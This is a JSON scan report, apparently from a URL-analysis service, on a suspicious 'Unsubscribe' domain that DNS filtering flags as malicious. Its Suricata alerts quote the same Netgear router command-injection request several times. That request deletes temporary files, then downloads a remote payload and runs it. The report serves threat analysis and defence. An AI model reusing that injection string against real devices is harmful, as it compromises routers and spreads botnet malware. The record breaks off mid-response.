{"report_id":"71c7331d-5ede-4078-bfbd-4f90cf549ff7","version":6,"status":"done","tags":[],"date":"2025-02-06T17:18:00Z","url":{"schema":"http","addr":"www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":0,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"final":{"url":{"schema":"https","addr":"www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"title":"Unsubscribe"},"submit":{"url":{"schema":"","addr":"","fqdn":"","domain":"","tld":""},"ip":{"addr":"","port":0,"asn":0,"as":"","country":"","country_code":""},"tags":null,"meta":null},"settings":{"access":"public","device_type":"","expires_at":"2027-04-17T17:18:00Z","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0","referer":"","cookies":null,"exit_node":"z0yflva4pidy47h"},"stats":{"alert_count":{"ids":0,"urlquery":0,"analyzer":0}},"detection":{"ids":null,"analyzer":null,"urlquery":null},"summary":[{"fqdn":"cdn.jsdelivr.net","ip":{"addr":"151.101.1.229","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"domain_registered":"2012-05-16","domain_rank":439,"first_seen":"2012-09-30T00:15:09Z","last_seen":"2025-02-05T02:06:54.301722Z","alert_count":0,"request_count":2,"received_data":53658,"sent_data":931,"comment":"","tags":null,"fingerprints":null},{"fqdn":"code.jquery.com","ip":{"addr":"151.101.66.137","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"domain_registered":"2005-12-10","domain_rank":634,"first_seen":"2012-05-21T17:28:02Z","last_seen":"2025-02-05T02:23:07.868075Z","alert_count":0,"request_count":1,"received_data":31510,"sent_data":428,"comment":"","tags":null,"fingerprints":null},{"fqdn":"www.variationtidy.best","ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"domain_registered":"2025-02-04","domain_rank":0,"first_seen":"2025-02-06T17:18:00.753368Z","last_seen":"2025-02-06T17:18:00.753368Z","alert_count":5,"request_count":5,"received_data":19814,"sent_data":2937,"comment":"","tags":null,"fingerprints":null}],"files":null,"artifacts":{"windows_shortcuts":null,"files":null,"telegram":null,"pdfs":null,"clipboard":null},"sensors":{"ids":[{"sensor_name":"suricata","description":"Suricata /w Emerging Threats Pro","alerts":[{"sensor_name":"suricata","title":"","description":"","date":"2025-02-06T17:17:29Z","timestamp":1738862249,"ip_dst":{"addr":"129.110.46.75","port":80,"asn":20162,"as":"UTDALLAS","country":"United States","country_code":"US"},"ip_src":{"addr":"172.18.0.18","port":60360,"asn":0,"as":"","country":"","country_code":"zz"},"severity":"high","alert":"ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound","source":"{\"timestamp\":\"2025-02-06T17:17:29.620808+0000\",\"flow_id\":2008386539076292,\"in_iface\":\"br-31613a7ed13b\",\"event_type\":\"alert\",\"src_ip\":\"172.18.0.18\",\"src_port\":60360,\"dest_ip\":\"129.110.46.75\",\"dest_port\":80,\"proto\":\"TCP\",\"metadata\":{\"flowbits\":[\"http.dottedquadhost\"]},\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2029215,\"rev\":2,\"signature\":\"ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound\",\"category\":\"Attempted Administrator Privilege Gain\",\"severity\":1,\"metadata\":{\"affected_product\":[\"Netgear_Router\"],\"attack_target\":[\"IoT\"],\"created_at\":[\"2019_12_31\"],\"deployment\":[\"Perimeter\"],\"signature_severity\":[\"Major\"],\"updated_at\":[\"2020_10_27\"]}},\"http\":{\"hostname\":\"129.110.46.75\",\"url\":\"/setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-rf+/tmp/*;wget+http://223.166.104.158:57766/mozi.m+-o+/tmp/netgear;sh+netgear\u0026curpath=/\u0026currentsetting.htm=1\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":3,\"pkts_toclient\":2,\"bytes_toserver\":764,\"bytes_toclient\":128,\"start\":\"2025-02-06T17:15:39.441028+0000\"}}"},{"sensor_name":"suricata","title":"","description":"","date":"2025-02-06T17:17:32Z","timestamp":1738862252,"ip_dst":{"addr":"129.110.46.75","port":80,"asn":20162,"as":"UTDALLAS","country":"United States","country_code":"US"},"ip_src":{"addr":"172.18.0.18","port":60372,"asn":0,"as":"","country":"","country_code":"zz"},"severity":"high","alert":"ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound","source":"{\"timestamp\":\"2025-02-06T17:17:32.283595+0000\",\"flow_id\":2009894072610858,\"in_iface\":\"br-31613a7ed13b\",\"event_type\":\"alert\",\"src_ip\":\"172.18.0.18\",\"src_port\":60372,\"dest_ip\":\"129.110.46.75\",\"dest_port\":80,\"proto\":\"TCP\",\"metadata\":{\"flowbits\":[\"http.dottedquadhost\"]},\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2029215,\"rev\":2,\"signature\":\"ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound\",\"category\":\"Attempted Administrator Privilege Gain\",\"severity\":1,\"metadata\":{\"affected_product\":[\"Netgear_Router\"],\"attack_target\":[\"IoT\"],\"created_at\":[\"2019_12_31\"],\"deployment\":[\"Perimeter\"],\"signature_severity\":[\"Major\"],\"updated_at\":[\"2020_10_27\"]}},\"http\":{\"hostname\":\"129.110.46.75\",\"url\":\"/setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-rf+/tmp/*;wget+http://223.166.104.158:57766/mozi.m+-o+/tmp/netgear;sh+netgear\u0026curpath=/\u0026currentsetting.htm=1\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":3,\"pkts_toclient\":2,\"bytes_toserver\":764,\"bytes_toclient\":128,\"start\":\"2025-02-06T17:15:39.978986+0000\"}}"},{"sensor_name":"suricata","title":"","description":"","date":"2025-02-06T17:17:39Z","timestamp":1738862259,"ip_dst":{"addr":"129.110.46.75","port":80,"asn":20162,"as":"UTDALLAS","country":"United States","country_code":"US"},"ip_src":{"addr":"172.18.0.18","port":60350,"asn":0,"as":"","country":"","country_code":"zz"},"severity":"high","alert":"ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound","source":"{\"timestamp\":\"2025-02-06T17:17:39.605561+0000\",\"flow_id\":606388954570030,\"in_iface\":\"br-31613a7ed13b\",\"event_type\":\"alert\",\"src_ip\":\"172.18.0.18\",\"src_port\":60350,\"dest_ip\":\"129.110.46.75\",\"dest_port\":80,\"proto\":\"TCP\",\"metadata\":{\"flowbits\":[\"http.dottedquadhost\"]},\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2029215,\"rev\":2,\"signature\":\"ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound\",\"category\":\"Attempted Administrator Privilege Gain\",\"severity\":1,\"metadata\":{\"affected_product\":[\"Netgear_Router\"],\"attack_target\":[\"IoT\"],\"created_at\":[\"2019_12_31\"],\"deployment\":[\"Perimeter\"],\"signature_severity\":[\"Major\"],\"updated_at\":[\"2020_10_27\"]}},\"http\":{\"hostname\":\"129.110.46.75\",\"url\":\"/setup.cgi?next_file=netgear.cfg\u0026todo=syscmd\u0026cmd=rm+-rf+/tmp/*;wget+http://223.166.104.158:57766/mozi.m+-o+/tmp/netgear;sh+netgear\u0026curpath=/\u0026currentsetting.htm=1\",\"http_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":3,\"pkts_toclient\":2,\"bytes_toserver\":764,\"bytes_toclient\":128,\"start\":\"2025-02-06T17:15:39.171310+0000\"}}"}]}],"analyzer":[{"sensor_name":"infosec_yara","type":"yara","description":"Public InfoSec YARA rules","link":"","alerts":null},{"sensor_name":"openphish","type":"url","description":"OpenPhish","link":"","alerts":null},{"sensor_name":"phishtank","type":"url","description":"PhishTank","link":"","alerts":null},{"sensor_name":"quad9","type":"domain","description":"Quad9 DNS","link":"","alerts":[{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null},{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null},{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null},{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null},{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null}]},{"sensor_name":"threatfox","type":"url","description":"ThreatFox","link":"","alerts":null}],"urlquery":null},"javascript":{"script":[{"url":{"schema":"https","addr":"code.jquery.com/jquery-3.6.0.min.js","fqdn":"code.jquery.com","domain":"jquery.com","tld":"com"},"ip":{"addr":"151.101.66.137","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"introduction_type":"scriptElement","is_inline":false,"md5":"8fb8fee4fcc3cc86ff6c724154c49c42","sha1":"b82d238d4e31fdf618bae8ac11a6c812c03dd0d4","sha256":"ff1523fb7389539c84c65aba19260648793bb4f5e29329d2ee8804bc37a3fe6e","sha512":"f3de1813a4160f9239f4781938645e1589b876759cd50b7936dbd849a35c38ffaed53f6a61dbdd8a1cf43cf4a28aa9fffbfddeec9a3811a1bb4ee6df58652b31","ssdeep":"1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn","tlshash":"069309ddb2c6702257a720ba007f510bf236199d6c4d8450f169d8eabc78a4e827bf7d","size":89501,"data":"","first_seen":"2023-03-07T01:02:13Z","last_seen":"2026-04-05T07:43:24.080116Z","times_seen":445213,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js","fqdn":"cdn.jsdelivr.net","domain":"jsdelivr.net","tld":"net"},"ip":{"addr":"151.101.1.229","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"introduction_type":"scriptElement","is_inline":false,"md5":"849e6db145f2905ce210f628bddd9de5","sha1":"d722fa9982da8aa48df88251bb1897f13c1db3b9","sha256":"aa53d582f97eb594c2a5cc5824574707f9ba9837bce3046bfa5f3556860f4e04","sha512":"54adb372f9ed12e7da8a673e79f3988badb654de5969c767b9f9e65fbcc88423e68e12a73a2f590ccb60d7fba0e65d7cddfd7d806d7f701b2d3cee03f0dfc89a","ssdeep":"1536:OSif7R2qTTR2t4iYniNw+inreQURwTLBAF+27wXiYE3Yjr/I2:4R2cpXLBl27wXit3Yb","tlshash":"ca73b7593254b4730ade85b68037420bf2265994b24b802cb5bcadde2a7dcc67277f7c","size":80421,"data":"","first_seen":"2023-06-08T14:47:00Z","last_seen":"2026-04-05T07:09:30.720055Z","times_seen":13808,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"www.variationtidy.best/js.js","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":false,"md5":"d41d8cd98f00b204e9800998ecf8427e","sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709","sha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sha512":"cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e","ssdeep":"","tlshash":"c710000000000000000000000000000030000000000000000000000000000000000000","size":0,"data":"","first_seen":"0001-01-01T00:00:00Z","last_seen":"2026-04-05T07:47:05.597876Z","times_seen":13365748,"alerts":{"ids":null,"analyzer":null,"urlquery":null}}],"eval":null,"write":null},"http":[{"url":{"schema":"https","addr":"cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js","fqdn":"cdn.jsdelivr.net","domain":"jsdelivr.net","tld":"net"},"ip":{"addr":"151.101.1.229","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"is_navigation_request":false,"resource_type":"script","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.694Z","timestamp":1738862250694,"http_version":"HTTP/2","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"RSA-PSS-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"jsdelivr.net","organization":""},"issuer":{"commonName":"GlobalSign Atlas R3 DV TLS CA 2024 Q3","organization":"GlobalSign nv-sa"},"validity":{"start":"Tue, 30 Jul 2024 15:36:05 GMT","end":"Sun, 31 Aug 2025 15:36:04 GMT"},"fingerprint":{"sha1":"6C:45:F5:9E:D3:37:60:0B:9C:A8:28:29:A4:E6:41:33:BB:2E:76:5C","sha256":"A9:B8:7C:31:7F:16:E8:65:1C:A9:F0:0B:31:65:FF:03:C3:14:1C:09:22:A9:BF:2D:D0:7A:B1:DB:4B:C5:2F:46"}}},"request":{"raw":"GET /npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js HTTP/1.1\r\nHost: cdn.jsdelivr.net\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/\r\nSec-Fetch-Dest: script\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\naccess-control-allow-origin: *\r\naccess-control-expose-headers: *\r\ntiming-allow-origin: *\r\ncache-control: public, max-age=31536000, s-maxage=31536000, immutable\r\ncross-origin-resource-policy: cross-origin\r\nx-content-type-options: nosniff\r\nstrict-transport-security: max-age=31536000; includeSubDomains; preload\r\ncontent-type: application/javascript; charset=utf-8\r\nx-jsd-version: 5.3.0\r\nx-jsd-version-type: version\r\netag: W/\"13a25-1yL6mYLaiqSN+IJRuxiX8Twds7k\"\r\ncontent-encoding: br\r\naccept-ranges: bytes\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\nage: 5490966\r\nx-served-by: cache-fra-etou8220038-FRA, cache-hel1410024-HEL\r\nx-cache: HIT, HIT\r\nvary: Accept-Encoding\r\nalt-svc: h3=\":443\";ma=86400,h3-29=\":443\";ma=86400,h3-27=\":443\";ma=86400\r\ncontent-length: 24668\r\nX-Firefox-Spdy: h2\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":24668,"size_decoded":80421,"mime_type":"application/javascript; charset=utf-8","magic":"JavaScript source, ASCII text, with very long lines (65299)","md5":"849e6db145f2905ce210f628bddd9de5","sha1":"d722fa9982da8aa48df88251bb1897f13c1db3b9","sha256":"aa53d582f97eb594c2a5cc5824574707f9ba9837bce3046bfa5f3556860f4e04","sha512":"54adb372f9ed12e7da8a673e79f3988badb654de5969c767b9f9e65fbcc88423e68e12a73a2f590ccb60d7fba0e65d7cddfd7d806d7f701b2d3cee03f0dfc89a","ssdeep":"1536:OSif7R2qTTR2t4iYniNw+inreQURwTLBAF+27wXiYE3Yjr/I2:4R2cpXLBl27wXit3Yb","tlshash":"ca73b7593254b4730ade85b68037420bf2265994b24b802cb5bcadde2a7dcc67277f7c","first_seen":"2023-06-08T14:47:00Z","last_seen":"2026-04-05T07:09:30.720055Z","times_seen":13808,"resource_available":true,"data":null}},"time_used":229,"timings":{"blocked":92,"dns":37,"connect":26,"send":0,"wait":27,"receive":8,"ssl":34},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"code.jquery.com/jquery-3.6.0.min.js","fqdn":"code.jquery.com","domain":"jquery.com","tld":"com"},"ip":{"addr":"151.101.66.137","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"is_navigation_request":false,"resource_type":"script","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.693Z","timestamp":1738862250693,"http_version":"HTTP/2","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"*.jquery.com","organization":""},"issuer":{"commonName":"Sectigo ECC Domain Validation Secure Server CA","organization":"Sectigo Limited"},"validity":{"start":"Tue, 25 Jun 2024 00:00:00 GMT","end":"Wed, 25 Jun 2025 23:59:59 GMT"},"fingerprint":{"sha1":"CD:B5:6E:05:85:0C:5A:AE:47:12:80:2A:5B:C6:E5:8F:11:72:E2:B5","sha256":"AB:77:AE:8B:01:C3:97:E7:80:17:A2:C0:A0:8D:8A:BE:C9:8A:77:1C:06:8C:B9:64:E1:7B:E5:9F:3B:E7:EC:FA"}}},"request":{"raw":"GET /jquery-3.6.0.min.js HTTP/1.1\r\nHost: code.jquery.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/\r\nSec-Fetch-Dest: script\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\nserver: nginx\r\ncontent-type: application/javascript; charset=utf-8\r\nlast-modified: Fri, 18 Oct 1991 12:00:00 GMT\r\netag: W/\"28feccc0-15d9d\"\r\ncache-control: public, max-age=31536000, stale-while-revalidate=604800\r\naccess-control-allow-origin: *\r\ncross-origin-resource-policy: cross-origin\r\ncontent-encoding: gzip\r\nvia: 1.1 varnish, 1.1 varnish\r\naccept-ranges: bytes\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\nage: 2615784\r\nx-served-by: cache-lga21931-LGA, cache-hel1410032-HEL\r\nx-cache: HIT, HIT\r\nx-cache-hits: 71, 1189495\r\nx-timer: S1738862251.815147,VS0,VE0\r\nvary: Accept-Encoding\r\ncontent-length: 30875\r\nX-Firefox-Spdy: h2\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":30875,"size_decoded":89501,"mime_type":"application/javascript; charset=utf-8","magic":"JavaScript source, ASCII text, with very long lines (65447)","md5":"8fb8fee4fcc3cc86ff6c724154c49c42","sha1":"b82d238d4e31fdf618bae8ac11a6c812c03dd0d4","sha256":"ff1523fb7389539c84c65aba19260648793bb4f5e29329d2ee8804bc37a3fe6e","sha512":"f3de1813a4160f9239f4781938645e1589b876759cd50b7936dbd849a35c38ffaed53f6a61dbdd8a1cf43cf4a28aa9fffbfddeec9a3811a1bb4ee6df58652b31","ssdeep":"1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn","tlshash":"069309ddb2c6702257a720ba007f510bf236199d6c4d8450f169d8eabc78a4e827bf7d","first_seen":"2023-03-07T01:02:13Z","last_seen":"2026-04-05T07:43:24.080116Z","times_seen":445213,"resource_available":true,"data":null}},"time_used":258,"timings":{"blocked":115,"dns":30,"connect":13,"send":0,"wait":17,"receive":5,"ssl":75},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css","fqdn":"cdn.jsdelivr.net","domain":"jsdelivr.net","tld":"net"},"ip":{"addr":"151.101.1.229","port":443,"asn":54113,"as":"FASTLY","country":"United States","country_code":"US"},"is_navigation_request":false,"resource_type":"stylesheet","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.691Z","timestamp":1738862250691,"http_version":"HTTP/2","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"RSA-PSS-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"jsdelivr.net","organization":""},"issuer":{"commonName":"GlobalSign Atlas R3 DV TLS CA 2024 Q3","organization":"GlobalSign nv-sa"},"validity":{"start":"Tue, 30 Jul 2024 15:36:05 GMT","end":"Sun, 31 Aug 2025 15:36:04 GMT"},"fingerprint":{"sha1":"6C:45:F5:9E:D3:37:60:0B:9C:A8:28:29:A4:E6:41:33:BB:2E:76:5C","sha256":"A9:B8:7C:31:7F:16:E8:65:1C:A9:F0:0B:31:65:FF:03:C3:14:1C:09:22:A9:BF:2D:D0:7A:B1:DB:4B:C5:2F:46"}}},"request":{"raw":"GET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1\r\nHost: cdn.jsdelivr.net\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/css,*/*;q=0.1\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/\r\nSec-Fetch-Dest: style\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\naccess-control-allow-origin: *\r\naccess-control-expose-headers: *\r\ntiming-allow-origin: *\r\ncache-control: public, max-age=31536000, s-maxage=31536000, immutable\r\ncross-origin-resource-policy: cross-origin\r\nx-content-type-options: nosniff\r\nstrict-transport-security: max-age=31536000; includeSubDomains; preload\r\ncontent-type: text/css; charset=utf-8\r\nx-jsd-version: 5.3.0\r\nx-jsd-version-type: version\r\netag: W/\"38dd2-sjFlHg/Wi72HWBifvTZCxGLTT6Y\"\r\ncontent-encoding: br\r\naccept-ranges: bytes\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\nage: 1936981\r\nx-served-by: cache-fra-eddf8230088-FRA, cache-hel1410024-HEL\r\nx-cache: HIT, HIT\r\nvary: Accept-Encoding\r\nalt-svc: h3=\":443\";ma=86400,h3-29=\":443\";ma=86400,h3-27=\":443\";ma=86400\r\ncontent-length: 27424\r\nX-Firefox-Spdy: h2\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":27424,"size_decoded":232914,"mime_type":"text/css; charset=utf-8","magic":"Unicode text, UTF-8 text, with very long lines (65342)","md5":"fe7fdfec700d100dc745dc64d3600cb2","sha1":"b231651e0fd68bbd8758189fbd3642c462d34fa6","sha256":"7f1d37f0d90b6385354c2ac10e2bb91563c46bd7a266ed351222ebcac8496c2a","sha512":"b7819649564ed5e0bc04cdf7f5777b529870e6cd7b6bcead219223f2a4718672ae6fa5a8ca19ebc5e08831e02a04f81d646942706d8fad98cc73e5abefcfb95e","ssdeep":"1536:VYutjsbf98fOdBfvO5wlP7Qy9A374298wsY/ElV6V6pz600I41r:ntj898fo298uI6V6pz600I41r","tlshash":"383481d6f590317d9ca7c1499681fefd896fa985cb120aa6f003776807cabd30962dcc","first_seen":"2023-06-08T14:47:00Z","last_seen":"2026-04-05T07:09:30.720663Z","times_seen":19774,"resource_available":false,"data":null}},"time_used":253,"timings":{"blocked":99,"dns":34,"connect":26,"send":0,"wait":31,"receive":20,"ssl":33},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"www.variationtidy.best/js.js","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"script","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.696Z","timestamp":1738862250696,"http_version":"HTTP/3","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"variationtidy.best","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Tue, 04 Feb 2025 14:48:27 GMT","end":"Mon, 05 May 2025 15:46:51 GMT"},"fingerprint":{"sha1":"58:BF:5D:4D:8A:52:61:3C:6F:17:55:D2:3B:BA:75:90:63:63:7A:5B","sha256":"3B:93:64:5E:09:BC:07:BA:AC:3F:98:FD:6A:E9:0D:E1:5C:19:3A:E6:7D:E9:D5:B4:E6:9F:CC:F9:96:B5:9B:DD"}}},"request":{"raw":"GET /js.js HTTP/1.1\r\nHost: www.variationtidy.best\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=\r\nCookie: PHPSESSID=lc65ll7gpm00pbqa44is4jfjfs\r\nSec-Fetch-Dest: script\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nTE: trailers\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\ncontent-type: application/javascript\r\ncontent-length: 0\r\nlast-modified: Mon, 19 Aug 2024 21:39:22 GMT\r\netag: \"66c3bb8a-0\"\r\ncache-control: max-age=14400\r\ncf-cache-status: REVALIDATED\r\naccept-ranges: bytes\r\npriority: u=2,i=?0\r\nreport-to: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v4?s=CEX03tvCyTzgtFYtG57O3ufISevZy5tmJMe2DHE1X9yreJrTcaRkog9e3RTNUEbapoRayVkj1r43BOZIFZpLwRGAMEijiYZTydM75gn8Ga4ttty9cizfJ4cZEs9sSz4OCncBNo8E07Ck\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nnel: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nvary: Accept-Encoding\r\nserver: cloudflare\r\ncf-ray: 90dccb4acd25b4f1-OSL\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: 